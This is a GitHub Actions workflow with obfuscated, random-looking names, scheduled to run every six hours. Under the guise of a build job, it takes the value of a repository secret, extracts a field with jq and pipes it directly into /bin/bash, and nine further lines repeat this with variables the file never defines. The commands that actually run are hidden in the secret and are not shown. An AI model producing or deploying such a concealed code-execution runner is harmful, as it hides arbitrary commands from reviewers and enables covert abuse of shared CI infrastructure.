name: xiaolinan6715

on:
  workflow_dispatch:
  schedule:
    - cron: '14 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaolinan6715
        env:
          gvbe79612: ${{ secrets.gvbe79612 }}
        run: |
          echo $gvbe79612 | jq -r .ou9272 | /bin/bash
          echo $mloy83990 | jq -r .qelv8111 | /bin/bash
          echo $sntx87047 | jq -r .edopl08 | /bin/bash
          echo $eaptp7 | jq -r .nxij12912 | /bin/bash
          echo $tj72754 | jq -r .eeh19 | /bin/bash
          echo $mcwcf5 | jq -r .jiab8791 | /bin/bash
          echo $cfg45 | jq -r .wq39 | /bin/bash
          echo $jkt79584 | jq -r .a42 | /bin/bash
          echo $a865 | jq -r .zv46642 | /bin/bash
          echo $sqyog0192 | jq -r .meg697 | /bin/bash

